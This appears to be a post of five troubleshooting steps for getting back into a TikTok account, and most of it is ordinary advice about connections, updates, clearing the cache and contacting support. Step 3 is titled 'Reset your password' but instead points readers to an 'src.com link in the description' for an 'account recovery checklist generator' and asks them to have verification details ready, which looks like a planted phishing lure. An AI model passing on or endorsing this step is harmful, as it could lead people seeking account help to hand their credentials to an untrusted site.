I ran into this last week. Here's what fixed it for me. If you're having trouble logging into your TikTok account, follow these steps to get back in. Step 1. Check your internet connection. Make sure your device is connected to a stable internet connection. A weak or unstable connection can prevent you from logging in. Step 2. Update the app. Ensure that you have the latest version of the TikTok app installed. Go to your app store and check for updates. An outdated app can cause login issues. Step 3. Reset your password. Before starting recovery, use the src.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Clear app cache. Go to your device settings, find TikTok, and clear the app cache. This can help resolve any temporary glitches that may be causing the login failure. Just be cautious, clearing the cache will log you out of the app, so make sure you remember your login details. Step 5. Contact TikTok support. If none of the above steps work, reach out to TikTok support through the app or their website. They can provide assistance for account-specific issues. I hope these steps help you log back into your TikTok account smoothly. If you have any other questions, feel free to ask.